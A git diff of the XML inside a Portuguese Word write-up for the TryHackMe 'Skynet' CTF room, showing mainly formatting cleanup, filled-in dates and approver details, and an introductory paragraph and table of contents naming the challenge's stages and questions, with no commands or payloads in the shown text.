-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Este CTF se trata de um desafio fácil e com um tema muito interessante (exterminador do futuro). </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pBdr>
           <w:top w:val="nil"/>
           <w:left w:val="nil"/>
@@ -1868,6 +1851,88 @@
         <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Este CTF oferece uma experiência prática e desafiadora, explorando desde a fase de reconhecimento de uma rede</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>onde informações cruciais sobre serviços, portas abertas e sistemas são descobertas</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> até a escalada de privilégios para se obter controle total sobre as máquinas. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:top w:val="nil"/>
+          <w:left w:val="nil"/>
+          <w:bottom w:val="nil"/>
+          <w:right w:val="nil"/>
+          <w:between w:val="nil"/>
+        </w:pBdr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:b/>
           <w:smallCaps/>
           <w:color w:val="000000"/>
@@ -1876,8 +1941,6 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_heading=h.1fob9te" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkEnd w:id="1"/>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
@@ -1905,8 +1968,8 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_heading=h.3znysh7" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkEnd w:id="2"/>
+      <w:bookmarkStart w:id="1" w:name="_heading=h.3znysh7" w:colFirst="0" w:colLast="0"/>
+      <w:bookmarkEnd w:id="1"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -1954,16 +2017,14 @@
         </w:rPr>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>aonde</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>onde</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -2349,6 +2410,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Há 2 que é possível analisar, mas o foco agora é </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
@@ -2513,7 +2575,6 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7ABB1010" wp14:editId="75643590">
             <wp:extent cx="5610225" cy="590534"/>
@@ -2950,7 +3011,6 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Comando</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
@@ -3600,8 +3660,8 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_heading=h.2et92p0" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkEnd w:id="3"/>
+      <w:bookmarkStart w:id="2" w:name="_heading=h.2et92p0" w:colFirst="0" w:colLast="0"/>
+      <w:bookmarkEnd w:id="2"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -4063,8 +4123,8 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_heading=h.tyjcwt" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkEnd w:id="4"/>
+      <w:bookmarkStart w:id="3" w:name="_heading=h.tyjcwt" w:colFirst="0" w:colLast="0"/>
+      <w:bookmarkEnd w:id="3"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -5123,8 +5183,8 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_heading=h.3dy6vkm" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkEnd w:id="5"/>
+      <w:bookmarkStart w:id="4" w:name="_heading=h.3dy6vkm" w:colFirst="0" w:colLast="0"/>
+      <w:bookmarkEnd w:id="4"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7142,8 +7202,8 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_heading=h.1t3h5sf" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkEnd w:id="6"/>
+      <w:bookmarkStart w:id="5" w:name="_heading=h.1t3h5sf" w:colFirst="0" w:colLast="0"/>
+      <w:bookmarkEnd w:id="5"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -7166,16 +7226,14 @@
         </w:rPr>
         <w:t xml:space="preserve">O CTF em si não é difícil, o que o torna um pouco mais chato é a escalação de privilégio dele, porém nada </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>impossível .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>impossível.</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -7204,8 +7262,8 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_heading=h.4d34og8" w:colFirst="0" w:colLast="0"/>
-      <w:bookmarkEnd w:id="7"/>
+      <w:bookmarkStart w:id="6" w:name="_heading=h.4d34og8" w:colFirst="0" w:colLast="0"/>
+      <w:bookmarkEnd w:id="6"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
@@ -8076,7 +8134,6 @@
   <w:style w:type="character" w:default="1" w:styleId="Fontepargpadro">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="Tabelanormal">

--- a/TryHackMe/skynet/EIkebarbosa/writeup.docx
+++ b/TryHackMe/skynet/EIkebarbosa/writeup.docx
@@ -1,6 +1,6 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16du wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16sdtfl="http://schemas.microsoft.com/office/word/2024/wordml/sdtformatlock" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh w16sdtfl w16du wp14">
   <w:body>
     <w:p>
       <w:pPr>
@@ -102,23 +102,21 @@
           <w:szCs w:val="32"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t>Skynet</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">Skynet </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">– </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -126,18 +124,8 @@
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
         </w:rPr>
-        <w:t xml:space="preserve">– </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
         <w:t>TryHackMe</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -244,23 +232,13 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>Skynet</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
+              <w:t xml:space="preserve">Skynet </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -376,16 +354,14 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:proofErr w:type="spellStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>None</w:t>
+              <w:t>02/10/2025</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
           </w:p>
         </w:tc>
       </w:tr>
@@ -674,7 +650,7 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>Nome do aprovador</w:t>
+              <w:t>João Branco</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -697,7 +673,7 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>Diretor</w:t>
+              <w:t>Conselheiro</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1038,6 +1014,7 @@
                 <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
             </w:pPr>
             <w:r>
@@ -1046,7 +1023,16 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>DD/MM/AAAA</w:t>
+              <w:t>02</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+                <w:sz w:val="24"/>
+                <w:szCs w:val="24"/>
+                <w:lang w:val="en-US"/>
+              </w:rPr>
+              <w:t>/10/2025</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1069,83 +1055,15 @@
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-              <w:t>Aprovação</w:t>
+              <w:t xml:space="preserve">Revisão e </w:t>
             </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:trPr>
-          <w:trHeight w:val="390"/>
-        </w:trPr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="704" w:type="dxa"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-                <w:b/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-              </w:rPr>
-            </w:pPr>
             <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-                <w:b/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-              </w:rPr>
-              <w:t>3</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="2126" w:type="dxa"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
               <w:rPr>
                 <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                 <w:sz w:val="24"/>
                 <w:szCs w:val="24"/>
               </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-              </w:rPr>
-              <w:t>04/11/2024</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="5664" w:type="dxa"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-                <w:sz w:val="24"/>
-                <w:szCs w:val="24"/>
-              </w:rPr>
-              <w:t xml:space="preserve">2° Revisão </w:t>
+              <w:t>Aprovação</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1354,18 +1272,21 @@
               <w:color w:val="000000"/>
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
           <w:hyperlink w:anchor="_heading=h.2et92p0">
             <w:r>
               <w:rPr>
                 <w:color w:val="000000"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:t>What is the hidden directory?</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="000000"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1373,6 +1294,7 @@
           <w:r>
             <w:rPr>
               <w:color w:val="000000"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
             <w:t>6</w:t>
           </w:r>
@@ -1395,18 +1317,21 @@
               <w:color w:val="000000"/>
               <w:sz w:val="24"/>
               <w:szCs w:val="24"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
           <w:hyperlink w:anchor="_heading=h.tyjcwt">
             <w:r>
               <w:rPr>
                 <w:color w:val="000000"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:t>What is the vulnerability called when you can include a remote file for malicious purposes?</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="000000"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1414,6 +1339,7 @@
           <w:r>
             <w:rPr>
               <w:color w:val="000000"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
             <w:t>7</w:t>
           </w:r>
@@ -1434,18 +1360,21 @@
             <w:ind w:left="220"/>
             <w:rPr>
               <w:color w:val="000000"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
           </w:pPr>
           <w:hyperlink w:anchor="_heading=h.3dy6vkm">
             <w:r>
               <w:rPr>
                 <w:color w:val="000000"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:t>What is the user flag:?</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:color w:val="000000"/>
+                <w:lang w:val="en-US"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -1453,6 +1382,7 @@
           <w:r>
             <w:rPr>
               <w:color w:val="000000"/>
+              <w:lang w:val="en-US"/>
             </w:rPr>
             <w:t>8</w:t>
           </w:r>
@@ -1778,16 +1708,6 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
         <w:pBdr>
           <w:top w:val="nil"/>
           <w:left w:val="nil"/>
@@ -1807,6 +1727,18 @@
       </w:pPr>
       <w:bookmarkStart w:id="0" w:name="_heading=h.gjdgxs" w:colFirst="0" w:colLast="0"/>
       <w:bookmarkEnd w:id="0"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:smallCaps/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Contextualização</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1820,23 +1752,57 @@
         <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:b/>
-          <w:smallCaps/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-        </w:rPr>
-        <w:t>Contextualização</w:t>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Este CTF oferece uma experiência prática e desafiadora, explorando desde a fase de reconhecimento de uma rede</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>onde informações cruciais sobre serviços, portas abertas e sistemas são descobertas</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> até a escalada de privilégios para se obter controle total sobre as máquinas. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1855,54 +1821,6 @@
           <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Este CTF oferece uma experiência prática e desafiadora, explorando desde a fase de reconhecimento de uma rede</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>onde informações cruciais sobre serviços, portas abertas e sistemas são descobertas</w:t>
-      </w:r>
-      <w:r>
